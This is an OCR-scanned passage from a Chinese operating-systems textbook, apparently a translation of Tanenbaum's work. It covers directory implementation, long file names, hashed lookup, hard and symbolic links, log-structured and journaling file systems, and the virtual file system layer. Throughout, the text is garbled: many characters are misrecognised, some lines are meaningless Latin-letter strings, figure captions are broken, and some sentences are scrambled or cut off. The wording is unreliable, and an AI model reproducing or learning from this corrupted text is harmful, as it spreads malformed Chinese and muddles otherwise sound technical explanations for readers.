长 度 ) 文件 名 、 一 个 文件 属性 结构 以 及 用 以 说 明 磁盘 块 位 置 的 一 个 或 多 
个 磁盘 地 址 《至 某 个 最 大 值 ) 。 
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包含 属性 的 
a) b) ii 数据 结构 


图 4-14 简单 目录 ， 和 包含 固 定 大 小 的 目录 项 ， 在 目录 项 中 有 磁盘 地 
址 和 属性 ; b) 每 个 目录 项 只 引用 i 节点 的 目录 





对 于 采用 i 节点 的 系统 ， 还 存在 男 一 种 方法 ， 即 把 文件 属性 存放 在 i 
节点 中 而 不 是 目录 项 中 。 在 这 种 情形 下 ， 目 录 项 会 更 短 : 只 有 文件 名 和 
i 节点 号 。 这 种 方法 参见 图 4-14b。 后 面 我 们 会 看 到 ， 与 把 属性 存放 到 目 
录 项 中 相 比 ， 这 种 方法 更 好 。 图 4-14 中 的 两 种 处 理 方法 分 别 对 应 
Windows 和 UNIX， 在 后 面 我 们 将 讨论 它们 。 





到 目前 为 止 ， 我 们 已 经 假设 文件 具有 较 短 的 、 固 定 长 度 的 名 字 。 在 
MS-DOS 中 ， 文 件 有 1 一 8 个 字符 的 基本 名 和 1 一 3 字符 的 可 选 扩展 名 。 在 
UNIX V7 中 文件 名 有 1 一 14 个 字符 ， 包 括 任 何 扩展 名 。 但 是 ， 几 乎 所 有 
的 现代 操作 系统 都 文 持 可 变 长 度 的 长 文件 名 。 那 么 它们 是 如 何 实现 的 
呢 ? 





最 简单 的 方法 是 给 予 文件 名 一 个 长 度 限 制 ， 典 型 值 为 255 个 字符 ， 


然后 使 用 图 4-14 中 的 一 种 设计 ， 并 为 每 个 文件 名 保留 255 个 字符 空间 。 
这 种 处 理 很 简单 ， 但 是 浪费 了 大 量 的 目录 空间 ， 因 为 只 有 很 少 的 文件 会 
有 如 此 长 的 名 字 。 从 效率 考虑 ， 我 们 希望 有 其 他 的 结构 。 

















一 种 蔡 代 方案 是 放弃 * 所 有 目录 项 大 小 一 样 ” 的 想法 。 这 种 方法 中 ， 
每 个 目录 项 有 一 个 固定 部 分 ， 这 个 固定 部 分 通常 以 目录 项 的 长 度 开 始 ， 
后 面 是 固定 格式 的 数据 ， 通 常 包括 所 有 者 、 创 建 时 间 、 保 护 信息 以 及 其 
他 属性 。 这 个 固定 长 度 的 头 的 后 面 是 实际 文件 名 ， 可 能 是 如 图 4-15a 中 
的 正 序 格式 放置 〈 如 SPARC 机 器 ) [1 。 在 这 个 例子 中 ， 有 三 个 文件 ， 
project-budget、personnel 和 foo。 每 个 文件 名 以 一 个 特殊 字符 (通常 是 
0) 结束 ， 在 图 4-15 中 用 带 又 的 矩形 表示 。 为 了 使 每 个 目录 项 从 字 的 边 
界 开始 ， 每 个 文件 名 被 填充 成 整数 个 字 ， 如 图 4-15 中 带 阴 影 的 矩形 所 
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文件 1 项 长 度 
文件 1 属性 文件 1 属性 

指向 文件 2 的 文件 名 
文件 2 属性 

指向 文件 3 的 文件 名 
文件 3 属性 


指 辣 文 件 1 的 文件 名 
一 个 文件 的 项 





AEN 
件 的 项 





文件 2 项 长 度 
文件 2 属性 
SSEBRRER 


ERE ERED 
|! | ee 


文件 3 项 长 度 
文件 3 属性 





图 4-15 在 目录 中 处 理 长 文件 名 的 两 种 方法 : aki Pp; AP 


这 个 方法 的 缺点 是 ， 当 移 走 文件 后 ， 束 引入 了 一 个 长 度 可 变 的 空 
险 ， 而 下 一 个 进来 的 文件 不 一 定 正 好 适合 这 个 空 陀 。 这 个 问题 与 我 们 已 
经 看 到 的 连续 磁盘 文件 的 问题 是 一 样 的 ， 由 于 整个 目录 在 内 存 中 ， 所 以 
只 有 对 目录 进行 紧凑 操作 才 可 市 省 空间 。 男 一 个 问题 是 ， 一 个 目录 项 可 
能 会 分 布 在 多 个 页 面 上 ， 在 读 取 文 件 名 时 可 能 发 生 页 面 故障 。 











处 理 可 变 长 度 文件 名 字 的 为 一 种 方法 是 ， 使 目录 项 自 员 都 有 固定 长 
度 ， 而 将 文件 名 放置 在 目录 后 面 的 堆 中 ， 如 图 4-15b 所 示 。 这 一 方法 的 
优点 是 ， 当 一 个 文件 目录 项 被 移 走 后 ， 男 一 个 文件 的 目录 项 总 是 可 以 适 
合 这 个 空 队 。 妆 然 ， 必 须要 对 堆 进 行 管理 ， 而 在 处 理 文件 名 时 页 面 故障 





仍旧 会 及 生 。 男 一 个 小 优点 是 文件 名 不 再 需要 从 字 的 边界 开始 ， 这 样 ， 
原先 在 图 4-15a 中 需要 的 填充 字符 ， 在 图 4-15b 中 的 文件 名 之 后 就 不 再 需 


要 了 。 





到 目前 为 止 ， 在 需要 碍 找 文 件 名 时 ， 所 有 的 方案 都 是 线性 地 从 头 到 
尾 对 目录 进行 搜索 。 对 于 非常 长 的 目录 ， 线 性 查找 就 太 慢 了 。 加 快 碍 找 
速度 的 一 个 方法 是 在 每 个 目录 中 使 用 散 列 表 。 设 表 的 大 小 为 n。 在 输入 
文件 名 时 ， 文 件 名 被 散 列 到 1 和 n-1 之 间 的 一 个 值 ， 例 如 ， 它 被 n 除 ， 并 
取 余 数 。 其 他 可 以 采用 的 方法 有 ， 对 构成 文件 名 的 字 求 和 ， 其 结果 被 n 
除 ， 或 条 些 类 似 的 方法 。 























不 论 哪 种 方法 都 要 对 与 散 列 码 相 对 应 的 散 列 表 表 项 进行 检查 。 如 果 
该 表 项 没有 被 使 用 ， 束 将 一 个 指 问 文 件 目录 项 的 指针 放 入 ， 文 件 目 录 项 
紧 连 在 散 列 表 后 面 。 如 果 该 表 项 被 使 用 了 ， 就 构造 一 个 链表 ， 该 链表 的 
表 头 指针 存放 在 该 表 项 中 ， 并 链接 所 有 有 具有 相同 散 列 值 的 文件 目录 项 。 


查找 文件 按照 相同 的 过 程 进 行 。 散 列 处 理 文件 名 ， 以 便 选 择 一 个 散 
列表 项 。 检 查 链 表 头 在 该 位 置 上 的 所 有 表 项 ， 碍 看 要 找 的 文件 名 是 否 存 
在 。 如 果 名 字 不 在 该 链 上 ， 该 文件 就 不 在 这 个 目录 中 。 








使 用 散 列 表 的 优点 是 查找 非常 迅速 。 其 缺点 是 需要 复杂 的 管理 。 只 
有 在 预计 系统 中 的 目录 经 常会 有 成 百 上 二 个 文件 时 ， 才 把 散 列 方案 真正 
作为 备用 方案 考虑 。 








一 种 完全 不 同 的 加 快 大 型 目录 低 找 速度 的 方法 是 ， 将 查找 结果 存 入 
高 速 缓存 。 在 开始 碍 找 之 前 ， 驳 查看 文件 名 是 售 在 高 速 缓存 中 。 如 宁 
和 是， 该 文件 可 以 立即 定位 。 当 然 ， 只 有 在 构成 查找 主体 的 文件 非常 少 的 
时 候 ， 高 速 缓 存 的 方案 才 有 效果 。 











[1 ”处 理 机 中 的 一 串 字 符 存放 的 顺序 有 正 序 (big-endian) 和 逆序 (little- 
endian) 之 分 。 正 序 存 放 就 是 高 字 节 存放 在 前 低 字 节 在 后 ， 而 逆序 存放 
就 是 低 字 节 在 前 高 字 节 在 后 。 例 如 ， 十 六 进 制 数 为 A02B ， 正 序 存放 就 


是 A02B， 逆 序 存 放 就 是 2BA0。 译 者 注 





4.3.4 共享 文件 


当 几 个 用 户 同 在 一 个 项 目 里 工作 时 ， 他 们 常常 需要 共享 文件 。 其 结 
果 是 ， 如 果 一 个 共享 文件 同时 出 现在 属于 不 同 用 户 的 不 同 目录 下 ， 工 作 
起 来 就 很 方便 。 图 4-16 再 次 给 出 图 4-7 所 示 的 文件 系统 ， 只 是 C 的 一 个 文 
件 现 在 也 出 现在 B 的 目录 下 。B 的 目录 与 该 共享 文件 的 联系 称 为 一 个 连 
接 Clink) 。 这 样 ， 文 件 系 统 本 身 是 一 个 有 问 无 环 图 (Directed Acyclic 
Graph, DAG) 而 不 是 一 棵 树 。 











图 4-16 有 共享 文件 的 文件 系统 


共享 文件 是 方便 的 ， 但 也 带 来 一 些 问 题 。 如 果 目 录 中 包含 磁盘 地 
址 ， 则 当 连 接 文件 时 ， 必 须 把 C 目 录 中 的 磁盘 地 址 复制 到 B 目 录 中 。 如 
果 B 或 C 随 后 又 往 该 文件 中 添加 内 容 ， 则 新 的 数据 块 将 只 列 入 进行 添加 
工作 的 用 户 的 目录 中 。 其 他 的 用 户 对 此 改变 是 不 知道 的 。 所 以 违背 了 共 
享 的 目的 。 





有 两 种 方法 可 以 解决 这 一 问题 。 在 第 一 种 解决 方案 中 ， 磁 盘 块 不 列 
入 目录 ， 而 是 列 入 一 个 与 文件 本 里 关联 的 小 型 数据 结构 中 。 目 录 将 指向 
这 个 小 型 数据 结构 。 这 是 UNIX 系 统 中 所 采用 的 方法 (小 型 数据 结构 即 
是 i 节点 )。 











在 第 二 种 解决 方案 中 ， 通 过 让 系统 建立 一 个 类 型 为 LINK 的 新 文 
件 ， 并 把 该 文件 放 在 B 的 目录 下 ， 使 得 B 与 C 的 一 个 文件 存在 连接 。 新 的 
文件 中 只 包含 了 它 所 连接 的 文件 的 路 径 名 。 当 B 读 该 连接 文件 时 ， 操 作 
系统 查看 到 要 读 的 文件 是 LINK 类 型 ， 则 找到 该 文件 所 连接 的 文件 的 名 

， 并 且 去 读 那 个 文件 。 与 传统 〈 硬 ) 连接 相对 比 起 来 ， 这 一 方法 称 为 

号 连接 (symbolic linking) 。 


以 上 每 一 种 方法 都 有 其 缺点 。 第 一 种 方法 中 ， 当 B 连 接 到 共享 文件 
时 ， 证 点 记录 文件 的 所 有 者 是 C。 建 立 一 个 连接 并 不 改变 所 有 关系 〈 见 
图 4-17) ， 但 它 将 i 市 点 的 连接 计数 加 1， 所 以 系统 知道 目前 有 多 少 目录 
项 指向 这 个 文件 。 














如 果 以 后 C 试 图 删除 这 个 文件 ， 系 统 将 面临 问题 。 如 果 系 统 删 除 文 
件 并 清除 i 节点，B 则 有 一 个 目录 项 指 癌 一 个 无 效 的 i 语 操 。 如 果 该 i 亨 扩 
以 后 分 配给 为 一 个 文件 ， 则 B 的 连接 指向 一 个 错误 的 文件 。 系 统 通过 i 市 
点 中 的 计数 可 知 该 文件 仍然 被 引 用 ， 但 是 没有 办 法 找到 指 回 该 文件 的 全 
部 目录 项 以 删除 它们 。 指 同 目 录 的 指针 不 能 存储 在 i 点 中 ， 原 因 是 有 
可 能 有 无 数 个 目录 。 





惟一 能 做 的 就 是 只 删除 C 的 目录 项 ， 但 是 将 i 节 点 保留 下 来 ， 并 将 计 
数 置 为 1， 如 图 4-17c 所 示 。 而 现在 的 状况 是 ， 只 有 B 有 指向 该 文件 的 目 

录 项 ， 而 该 文件 的 所 有 者 是 C。 如 果 系统 进行 记 账 或 有 配额 ， 那 么 C 将 

继续 为 该 文件 付 账 直到 B 决 定 删除 它 ， 如 果真 是 这 样 ， 只 有 到 计数 变 为 0 
的 时 刻 ， 才 会 删除 该 文件 。 








C 的 目录 B 的 目录 CHAR B 的 目录 





图 4-17 习 连 接 之 前 的 状况 ; b) 创 建 连接 之 后 ; 9 当 所 有 者 删除 文件 后 





对 于 符号 连接 ， 以 上 问题 不 会 发 生 ， 因 为 只 有 真正 的 文件 所 有 者 才 
有 一 个 指 网 证 点 的 指针 。 连 接 到 该 文件 上 的 用 户 只 有 路 径 名 ， 没 有 指 
问 i 节 点 的 指针 。 当 文件 所 有 者 删除 文件 时 ， 该 文件 被 销毁 。 以 后 知 试 
图 通过 符 与 连接 访问 该 文件 将 导致 失败 ， 因 为 系统 不 能 找到 该 文件 。 删 
除 符 写 连接 根本 不 影响 该 文件 。 





符号 连接 的 问题 是 需要 额外 的 开销 。 必 须 读 取 包 含 路 径 的 文件 ， 然 
后 要 一 个 部 分 一 个 部 分 地 扫 插 路 径 ， 直 到 找到 i 节点 。 这 些 操作 也 许 需 
要 很 多 次 额外 的 磁盘 存 取 。 此 外 ， 每 个 符号 连接 都 需要 额外 的 i 节 扩 ， 
以 及 额外 的 一 个 磁盘 块 用 于 存储 路 径 ， 虽 然 如 果 路 径 名 很 短 ， 作 为 一 种 
优化 ， 系 统 可 以 将 它 存 储 在 i 贡 点 中 。 符 号 连接 有 一 个 优势 ， 即 只 要 简 
单 地 提供 一 个 机 需 的 网 络 地 址 以 及 文件 在 该 机 器 上 驻 留 的 路 径 ， 就 可 以 
连接 全 球 任 何 地 方 的 机 器 上 的 文件 。 








还 有 丸 一 个 由 连接 带 来 的 问题 ， 在 符 写 连 接 和 其 他 方式 中 都 存在 。 
如 果 人 允许 连接 ， 文 件 有 两 个 或 多 个 路 径 。 碍 找 一 指定 目录 及 其 子 目录 下 
的 全 部 文件 的 程序 将 多 次 定位 到 被 连接 的 文件 。 例 如 ， 一 个 将 茶 一 目录 
及 其 子 目 录 下 的 文件 转 储 到 磁带 上 的 程序 有 可 能 多 次 复制 一 个 被 连接 的 
文件 。 进 而 ， 如 果 接 着 把 磁带 读 进 男 一 台 机 器 ， 除 非 转 储 程序 具有 智 
能 ， 人 否则 舟 连 接 的 文件 将 被 两 次 复制 到 磁盘 上 ， 而 不 是 只 是 家 连接 起 











六 





4.3.5 ”日志 结构 文件 系统 


不 断 进步 的 科技 给 现 有 的 文件 系统 带 来 了 更 多 的 挑战 。 特 别 是 CPU 
的 运行 速度 越 来 越 快 ， 人 磁盘 容量 越 来 越 大 ， 价 格 也 越 来 越 便宜 (但 是 磁 
盘 速 度 并 没有 增 快 多 少 ) ， 同 时 内 存 容量 也 以 指数 形式 增长 。 而 没有 得 
到 快速 发 展 的 参数 是 磁盘 的 寻 道 时 间 。 所 以 这 些 问题 综合 起 来 ， 便 成 为 
影响 很 多 文件 系统 性 能 的 一 个 瓶颈 。 为 此 ，Berkeley 设 计 了 一 种 全 新 的 
文件 系统 ， 试 图 缓解 这 个 问题 ， 即 日 志 结构 文件 系统 (Log-structured 
File System, LFS) 。 在 这 一 节 里 ， 我 们 简要 说 明 LEFS 是 如 何 工作 的 。 如 
果 需 要 了 解 更 多 相关 知识 ， 请 参阅 (Rosenblum 和 Ousterhout，1991) 。 














促使 设计 LFS 的 主要 原因 是 ，CPU 的 运行 速度 越 来 越 快 ，RAM 内 存 
容量 变 得 更 大 ， 同 时 磁盘 高 速 缓存 也 迅速 地 增加 。 进 而 ， 不 需要 磁盘 访 
问 操作 ， 就 有 可 能 满足 直接 来 自 文件 系统 高 速 缓存 的 很 大 一 部 分 读 请 
求 。 所 以 从 上 面 的 事实 可 以 推出 ， 未 来 多 数 的 磁盘 访问 是 写 操作 ， 这 
样 ， 在 一 些 文件 系统 中 使 用 的 提前 读 机 制 ( 需 要 读 取 数 据 之 前 预 取 磁盘 
块 ) ， 并 不 能 获得 更 好 的 性 能 。 











更 为 糟糕 的 情况 是 ， 在 大 多 数 文件 系统 中 ， 写 操作 往往 都 是 零碎 
的 。 一 个 50hs 的 磁盘 写 操作 之 前 通 单 需要 10ms 的 寻 道 时 间 和 4ms 的 旋转 
延迟 时 间 ， 可 见 零碎 的 磁盘 写 操作 是 极其 没有 效率 的 。 根 据 这 些 参数 ， 








磁盘 的 效率 降低 到 1% 以 下 。 


为 了 看 看 这 样 小 的 零碎 写 操作 从 何 而 来 ， 考 虑 在 UNIX 文 件 系 统 上 
创建 一 个 新 文件 。 为 了 写 这 个 文件 ， 必 须 写 该 文件 目录 的 i 证 上 操 、 目 录 
块 、 文 件 的 节点 以 及 文件 本 映 。 而 这 些 写 操作 都 有 可 能 修 延 迟 ， 那 么 
如 果 在 写 操作 完成 之 前 发 生死 机 ， 束 可 能 在 文件 系统 中 造成 严重 的 不 一 
致 性 。 正 因为 如 此 ,i 节点 的 写 操作 一 般 是 立即 完 成 的 。 


出 于 这 一 原因 ，LFS 的 设计 者 决定 重新 实现 一 种 UNIX 文 件 系 统 ， 
该 系统 即使 对 于 一 个 大 部 分 由 零碎 的 随机 写 操作 组 成 的 任务 ， 同 样 能 够 
充分 利用 磁盘 的 带宽 。 其 基本 思想 是 将 整个 磁盘 结构 化 为 一 个 日 志 。 每 
隅 一 段 时 间 ， 或 是 有 特殊 需要 时 ， 被 缓冲 在 内 存 中 的 所 有 未 决 的 写 操作 
都 被 放 到 一 个 单独 的 段 中 ， 作 为 在 日 志 末 尾 的 一 个 邻接 段 写 入 磁盘 。 一 
个 单独 的 段 可 能 会 包括 i 节 点 、 目 录 块 、 数 据 块 或 者 都 有 。 每 一 个 段 的 
开始 都 是 该 段 的 摘要 ， 说 明 该 段 中 都 包含 哪些 内 容 。 如 果 所 有 的 段 平 均 
在 1MB 左 右 ， 那 么 就 几乎 可 以 利用 磁盘 的 完整 市 宽 。 











在 LFS 的 设计 中 ， 同 样 存 在 着 i 节 点 ， 且 具有 与 UNIX 中 一 样 的 结 
构 ， 但 是 i 节点 分 散在 整个 日 志 中 ， 而 不 是 放 在 磁盘 的 某 一 个 固定 位 
置 。 尽 管 如 此 ， 当 一 个 i 节点 被 定位 后 ， 定 位 一 个 块 就 用 通常 的 方式 来 
完成 。 当 然 ， 由 于 这 种 设计 ， 要 在 磁盘 中 找到 一 个 i 节点 就 变 得 比较 困 
难 了 ， 因 为 节点 的 地 址 不 能 像 在 UNIX 中 那样 简单 地 通过 计算 得 到 。 为 
了 能 够 找到 i 节点 ， 必 须要 维护 一 个 由 i 节点 编号 索引 组 成 的 节点 图 。 在 














这 个 图 中 的 表 项 i 指向 磁盘 中 的 第 i 个 i 节点 。 这 个 图 保存 在 磁盘 上 ， 但 是 
也 保存 在 高 速 缓存 中 ， 因 此 ， 大 多 数 情况 下 这 个 图 的 最 常用 部 分 还 是 在 
内 存 中 。 





Mal, PAN SPER HRA EAT, Aaa PEE 
所 有 已 缓冲 的 写作 为 一 个 单独 的 段 ， 在 日 志 的 末尾 处 写 入 磁盘 。 要 打开 
一 个 文件 ， 则 首先 需要 从 i 节点 图 中 找到 文件 的 i 节操。 一 旦 i 市 乓 定位 之 
后 就 可 以 找到 相应 的 块 的 地 址 。 所 有 的 块 都 放 在 段 中 ， 在 日 志 的 系 个 位 
Ats 





如 果 磁 盘 空间 无 限 大 ， 那 么 有 了 前 面 的 讨论 整 足 够 了 。 但 是 ， 实 际 
的 硬盘 空间 是 有 限 的 ， 这 样 最 终日 志 将 会 占用 整个 磁盘 ， 到 那个 时 候 将 
不 能 往日 志 中 写 任 何 新 的 段 。 羊 运 的 是 ， 许 多 已 有 的 段 包含 了 很 多 不 再 
ma Zeek, PO, WARS CP te SABA ATS A te AT 
AER, (E3 H BER SPA CEE HS AEP hE TE o 











为 了 解决 这 个 问题 ，LFS 有 一 个 清理 线程 ， 该 清理 线程 周期 地 扫描 
日 志 进 行 磁 盘 压 缩 。 该 线程 首先 读 日 志 中 的 第 一 个 段 的 摘要 ， 检 查 有 哪 
些 i 贡 点 和 文件 。 然 后 该 线程 查看 当前 i 节 点 图 ， 判 断 该 i 贡 点 是 侣 有 效 以 
及 文件 块 是 否 仍 在 使 用 中 。 如 果 没 有 使 用 ， 则 该 信息 被 丢弃 。 如 果 仍 然 
使 用 ， 那 么 i 节点 和 块 束 进入 内 存 等 待 写 回 到 下 一 个 段 中 。 接 着 ， 原 来 
的 段 被 标记 为 空 ， 以 便 日 志 可 以 用 它 来 存放 新 的 数据 。 用 这 种 方法 ， 
清理 线程 近 历 日 志 ， 从 后 面 移 走 旧 的 段 ， 然 后 将 有 效 的 数据 放 入 内 存 等 





竺 写 到 下 一 个 段 中 。 由 此 ， 整 个 磁盘 成 为 一 个 大 的 环形 的 缓冲 区 ， 写 线 
程 将 新 的 段 写 到 前 面 ， 而 清理 线程 则 将 旧 的 段 从 后 面 移 走 。 


日 志 的 管理 并 不 简单 ， 因 为 当 一 个 文件 其 被 写 回 到 一 个 新 段 的 时 
候 ， 该 文件 的 i 节 点 〈 在 日 志 的 某 个 地 方 ) 必须 首先 要 定位 、 更 新 ， 然 
后 放 到 内 存 中 准备 写 回 到 下 一 个 段 中 。i 节 点 图 接着 必须 更 新 以 指 癌 新 
的 位 置 。 尽 管 如 此 ， 对 日 志 进 行 管理 还 是 可 行 的 ， 而 且 性 能 分 析 的 结果 
表明 ， 这 种 由 管理 而 带 来 的 复杂 性 是 值得 的 。 在 上 面 所 引用 文章 中 的 测 
试 数据 表明 ，LFS 在 处 理 大 量 的 零碎 的 写 操作 时 性 能 上 优 于 UNIX， 而 
在 读 和 大 块 写 操作 的 性 能 方面 并 不 比 UNIX 文 件 系 统 莽 ， 甚 至 更 好 。 











4.3.6 ”日志 文件 系统 


虽然 基于 日 志 结 构 的 文件 系统 是 一 个 很 吸引 人 的 想法 ， 但 是 由 于 它 
们 和 现 有 的 文件 系统 不 相 匹 配 ， 所 以 还 没有 被 广泛 应 用 。 尽 管 如 此 ， 它 
们 内 在 的 一 个 思想 ， 即 面 对 出 错 的 鲁 棒 性 ， 却 可 以 被 其 他 文件 系统 所 借 
鉴 。 这 里 的 基本 想法 是 保存 一 个 用 于 记录 系统 下 一 步 将 要 做 什么 的 日 
志 。 这 样 当 系统 在 完成 它们 即将 完成 的 任务 前 骨 溃 时 ， 重 新 启动 后 ， 可 
以 通过 查看 日 志 ， 获 取 骨 溃 前 计划 完成 的 任务 ， 并 完成 它们 。 这 样 的 文 
件 系 统 被 称 为 日 志文 件 系 统 ， 并 已 经 被 实际 应 用 。 微 软 〈Microsoft) 的 
NTFS 文 件 系统 、Linux ext3 和 ReiserFS 文 件 系统 都 使 用 日 志 。 接 下 来 ， 
我 们 会 对 这 个 话题 进行 简短 介绍 








为 了 看 清 这 个 问题 的 实质 ， 考 虑 一 个 简单 、 普 ; 
作 : 移 除 文件 。 这 个 操作 (在 UNIX 中 ) 需要 三 个 步骤 完成 : 
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1) 在 目录 中 删除 文件 ; 
2) 释 放 i 节 点 到 空闲 i 节点 池 ; 
3) 将 所 有 磁盘 块 归还 空闲 磁盘 块 池 。 


在 Windows 中 ， 也 需要 类 似 的 步 台 。 不 存在 系统 崩 沉 时 ， 这 些 步 又 
执行 的 顺序 不 会 带 来 问题 ， 但 是 当 存 在 系统 衣 训 时， 就 会 带 来 问题 。 假 





如 在 第 一 步 完 成 后 系统 崩 沉 。i 节 点 和 文件 块 将 不 会 被 任何 文件 获得 ， 
也 不 会 被 再 分 配 ;， 它们 只 存在 于 废物 池 中 的 某 个 地 方 ， 并 因此 减少 了 可 
利用 的 资源 。 如 果 骨 溃 发 生 在 第 二 步 后 ， 那 么 只 有 磁盘 块 会 丢失 。 





如 果 操 作 顺 序 被 更 改 ， 并 且 i 节 点 最 先 被 释放 ， 这 样 在 系统 重 局 
后 ，i 节 点 可 以 被 再 分 配 ， 但 是 旧 的 目录 入 口 将 继续 指 癌 它 ， 因 此 指 加 
错误 文件 。 如 宁夏 盘 英 最 和 多 被 释放 ， 这 样 一 个 在 证 点 和 被 清除 前 的 系统 
月 省 将 意味 着 一 个 有 效 的 目录 入 口 指向 一 个 i 节 点 ， 它 所 列 出 的 磁盘 块 
当前 存在 于 空闲 块 存 储 池 中 并 可 能 很 快 被 再 利用 。 这 将 导致 两 个 或 更 多 
的 文件 分 享 同样 的 磁盘 块 。 这 样 的 结果 都 是 不 好 的 。 














日 志文 件 系统 则 先 写 一 个 日 志 项 ， 列 出 三 个 将 要 完成 的 动作 。 然 后 
日 志 项 被 写 入 磁盘 (并 且 为 了 良好 地 实施 ， 可 能 从 磁盘 读 回 来 验证 它 的 
完整 性 ) 。 只 有 当日 志 项 已 经 被 写 入 ， 不 同 的 操作 才 可 以 进行 。 当 所 有 
的 操作 成 功 完 成 后 ， 擦 除 日 志 项 。 如 果 系 统 这 时 骨 尝 ， 系 统 恢复 后 ， 文 
件 系统 可 以 通过 检查 日 志 来 查看 是 不 是 有 未 完成 的 操作 。 如 果 有 ， 可 以 
重新 运行 所 有 未 完成 的 操作 (这 个 过 程 在 系统 骨 演 重复 及 生 时 执行 多 
次 ) ， 直 到 文件 被 正确 地 删除 。 




















为 了 让 日 志文 件 系 统 工作 ， 说 写 入 日 志 的 操作 必须 是 暴 等 的 ， 它 意 
味 着 只 要 有 必要 ， 它 们 束 可 以 重复 执行 很 多 座 ， 并 不 会 带 来 破坏 。 像 操 
作 * 更 新 位 表 并 标记 i 节 点 k 或 者 块 n 是 空 采 的 ?可 以 重复 任意 次 。 同 样 地 ， 
查找 一 个 目录 并 且 删 除 所 有 叫 foobar 的 项 也 是 肾 等 的 。 在 另 一 方面 ， 把 














从 i 节 点 k 新 释放 的 块 加 入 空闲 表 的 末端 不 是 才 等 的 ， 因 为 它们 可 能 已 经 
被 释放 并 存放 在 那里 了 。 更 复杂 的 操作 如 “和 碍 找 空闲 块 列 表 并 且 如 采 块 n 
不 在 列表 就 将 块 nx 加 入 ?是 晖 等 的 。 日 志文 件 系 统 必 须 安 排 它 们 的 数据 结 
构 和 可 写 入 日 志 的 操作 以 使 它们 都 是 最 等 的 。 在 这 些 条 件 下 ， 崩 演 恢 复 
可 以 被 快速 安全 地 实施 。 


为 了 增加 可 信 性 ， 一 个 文件 系统 可 以 引入 数据 库 中 原子 事务 
(atomic transaction) 的 概念 。 使 用 这 个 概念 ， 一 组 动作 可 以 被 界定 在 
开始 事务 和 结束 事务 操作 之 间 。 这 样 ， 文 件 系统 就 会 知道 它 必 须 完成 所 
有 被 界定 的 操作 ， 或 者 什么 也 不 做 ， 但 是 没有 其 他 的 选择 。 


NTEFS 有 一 个 扩展 的 日 志文 件 系 统 ， 并 且 它 的 结构 几乎 不 会 因 系统 
月 溃 而 受到 破坏 。 自 1993 年 NTFS 第 一 次 随 Windows NT 一 起 发 行 以 来 就 
在 不 断 地 发 展 。Linux 上 有 日 志 功 能 的 第 一 个 文件 系统 是 ReiserFS， 但 是 
因为 它 和 后 来 标准 化 的 ext2 文 件 系 统 不 相 匹 配 ， 它 的 推广 受到 阻碍 。 相 
比 之 下 ，ext3 一 一 一 个 不 像 ReiserFS 那 么 有 野心 的 工程 ， 也 具有 日 志文 
件 功能 并 且 和 之 前 的 ext2 系 统 可 以 共存 。 





4.3.7 ”虚拟 文件 系统 


即使 在 同一 台 计 算 机 上 同一 个 操作 系统 下 ， 也 会 使 用 很 多 不 同 的 文 
件 系统 。 一 个 Windows 可 能 有 一 个 主要 的 NTFS 文 件 系统 ， 但 是 也 有 继 
承 的 FAT-32 或 者 FAT-16 驱 动 ， 或 包含 旧 的 但 仍 被 使 用 的 数据 的 分 区 ， 

并 且 不 时 地 也 可 能 需要 一 个 CD-ROM 或 者 DVD (每 一 个 包含 它们 特有 的 
文件 系统 ) 。Windows 通 过 指定 不 同 的 盘 符 来 处 理 这 些 不 同 的 文件 系 
统 ， 比 如 “C:”、“D:" 等 。 当 一 个 进程 打开 一 个 文件 ， 盘 符 是 显 式 或 者 隐 
式 存 在 的 ， 所 以 Windows 知 道 向 哪个 文件 系统 传递 请 求 ， 不 需要 尝试 将 
不 同类 型 文件 系统 整合 为 统一 模式 。 








相 比 之 下 ， 所 有 现代 的 UNIX 系 统 做 了 一 个 很 认真 的 尝试 ， 即 将 多 
种 文件 系统 整合 到 一 个 统一 的 结构 中 。 一 个 Linux 系 统 可 以 用 ext2 作 为 根 
文件 系统 ，ext3 分 区 装载 在 home 下， 男 一 块 采用 ReiserFS 文 件 系 统 的 硬 
盘 装载 在 home 下 ， 以 及 一 个 ISO 9660 的 CD-ROM 临 时 装载 在 /mnt 下 。 从 
用 户 的 观点 来 看 ， 那 只 有 一 个 文件 系统 层级 。 它 们 事实 上 是 多 种 (不 相 
FSA) 文件 系统 ， 对 于 用 户 和 进程 是 不 可 见 的 。 








但 是 ， 多 种 文件 系统 的 存在 ， 在 实际 应 用 中 是 明确 可 见 的 ， 而 且 因 
为 先前 Sun 公 司 〈Kleiman,1986) 所 做 的 工作 ， 绝 大 多 数 UNIX 操 作 系统 
都 使 用 虚拟 文件 系统 (Virtual File System, VFS) 概念 尝试 将 多 种 文件 


系统 统一 成 一 个 有 序 的 框架 。 关 键 的 思想 就 是 抽象 出 所 有 文件 系统 都 共 
有 的 部 分 ， 并 且 将 这 部 分 代码 放 在 单独 的 一 层 ， 该 层 调 用 底层 的 实际 文 
件 系 统 来 具体 管理 数据 。 大 体 上 的 结构 在 图 4-18 中 有 阐述 。 以 下 的 介绍 
不 是 单独 针对 Linux 和 FreeBSD 或 者 其 他 版 本 的 UNIX， 而 是 给 出 了 一 种 
普遍 的 关于 UNIX 下 文件 系统 的 描述 。 


文件 系统 


高 速 绥 冲 区 





图 4-18 虚拟 文件 系统 的 位 置 


所 有 和 文件 相关 的 系统 调用 在 最 初 的 处 理 上 都 指向 虚拟 文件 系统 。 
这 些 来 自用 户 进程 的 调用 ， 都 是 标准 的 POSIX 系 统 调 用 ， 比 如 open、 
read write 和 lseek 等 。 因 此 ， 虚 拟 文件 系统 对 用 户 进程 有 一 个 “更 高 层 " 接 
口 ， 它 就 是 著名 的 POSIX 接 口 。 











VFS 也 有 一 个 对 于 实际 文件 系统 的 “更 低层 ”接口 ， 就 是 在 图 4-18 中 
被 标记 为 VFS 接 口 的 部 分 。 这 个 接口 包含 许多 功能 调用 ， 这 样 VFS 可 以 


使 每 一 个 文件 系统 完成 任务 。 因 此 ， 当 创造 一 个 新 的 文件 系统 和 VFS 一 
起 工作 时 ， 新 文件 系统 的 设计 者 就 必须 确定 它 提 供 VFS 所 需要 的 功能 调 
用 。 关 于 这 个 功能 的 一 个 明显 的 例子 束 是 从 磁盘 中 读 某 个 特定 的 其 ， 把 
它 放 在 文件 系统 的 高 速 缓冲 中 ， 并 且 返 回 指 同 它 的 指针 。 因 此 ，VFS 有 
两 个 不 同 的 接口 ， 上 层 给 用 户 进 程 的 接口 和 下 层 给 实际 文件 系统 的 接 

O. 





尽管 VFS 下 大 多 数 的 文件 系统 体现 了 本 地 磁盘 的 划分 ， 但 并 不 总 是 
这 样 。 事 实 上 ，Sun 建 立 虚 拟 文件 系统 最 原始 的 动机 是 支持 使 用 
